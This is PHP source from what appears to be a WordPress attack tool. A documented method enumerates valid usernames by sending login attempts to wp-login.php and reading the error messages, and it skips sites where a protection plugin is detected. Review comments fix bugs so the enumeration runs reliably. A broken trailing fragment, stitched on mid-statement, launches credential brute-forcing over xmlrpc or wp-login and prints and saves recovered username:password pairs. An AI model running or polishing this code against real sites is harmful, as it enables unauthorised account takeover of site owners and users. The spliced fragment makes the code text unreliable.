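/**
 * Checks every name in the configured wordlist against wp-login.php and
 * collects the names the site does not reject as unknown.
 *
 * One request per name is sent with a fixed placeholder password. A name is
 * kept when the response contains "200 ok" and does not contain
 * "invalid username" (both matched case-insensitively). The result depends
 * entirely on the login form answering differently for an unknown account
 * than for a wrong password; a site that returns one uniform login error
 * gives this check nothing to distinguish.
 *
 * When the 'protected' option is set, the run stops as soon as
 * WPBrute::isProtected() reports at least one plugin.
 *
 * @return array|false Unique matching names (keys as left by array_unique()),
 *                     or false when a protection plugin was reported, the
 *                     wordlist is missing, unreadable or empty, or no name
 *                     matched.
 */
private function brute()
{
    if (Config::get('protected')) {
        msg("[+] Checking if the site is bruteproof");
        $brute = new WPBrute($this->url);
        $protector = $brute->isProtected();
        if ($protector) {
            foreach ($protector as $plugin) {
                msg("[-] The site is protected by " . $plugin . " plugin");
            }
            return false;
        }
    }

    $wordlist = Config::get('uwordlist');
    if (!file_exists($wordlist)) {
        msg("[-] wordlist file does not exist");
        return false;
    }

    // file() returns false on a read failure (for example a directory or an
    // unreadable file); passing that on to array_chunk() is a TypeError on PHP 8.
    $array = file($wordlist, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    if ($array === false) {
        msg("[-] wordlist file could not be read");
        return false;
    }
    if (empty($array)) {
        return false;
    }

    // The original interpolated an undefined $str here; the text printed is
    // unchanged, only the undefined-variable warning is gone.
    msg("[+] " . count($array) . " list loaded");

    // array_chunk() throws on a size below 1, so clamp the batch size.
    $batchSize = max(1, (int) $this->threads);

    $users = [];
    foreach (array_chunk($array, $batchSize) as $uchunk) {
        $urls = [];
        $datas = [];
        foreach ($uchunk as $username) {
            $urls[] = $this->url . '/wp-login.php';
            $datas[] = [
                'log=' . urlencode($username) . '&pwd=klol&wp-submit=Log+In&testcookie=1',
                [
                    'Content-type: application/x-www-form-urlencoded',
                    'Cookie: wordpress_test_cookie=WP+Cookie+check',
                ],
            ];
        }

        // NOTE(review): the meaning of the second argument (1) is defined by
        // HTTPMultiRequest, which is not visible here. The loop below assumes
        // response keys line up with the request order — confirm.
        $responses = HTTPMultiRequest($urls, 1, $datas);
        foreach ($responses as $key => $resp) {
            // Compare against false explicitly: stripos() returns 0 for a
            // match at offset 0, which a bare truthiness test reads as a miss.
            $statusOk = stripos($resp, '200 ok') !== false;
            $rejected = stripos($resp, 'invalid username') !== false;
            if ($statusOk && !$rejected) {
                $users[] = $uchunk[$key];
            }
        }
    }

    return $users ? array_unique($users) : false;
}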
msg("[+] {$user}"); } } else { msg("[-] No user was found"); } } if (Config::get('bf')) { msg(""); msg("[+] Bruteforcing"); if (Config::get('xmlrpc')) { $method = $wpscan->xmlrpc_path ? 'xmlrpc' : 0; } else { $method = 'wp-login'; } if ($method) { $brute = new WPBrute($wpscan->url); if (Config::get('ufound')) { $brute->usernames = false; if (Config::get('eu')) { $brute->usernames = $userlist; } } $logins = $brute->brute($method); if ($logins) { if (!Config::get('nl')) { write_info('credentials', $logins); } foreach ($logins as $cred) { msg("[!] " . $cred[0] . ":" . $cred[1]); } }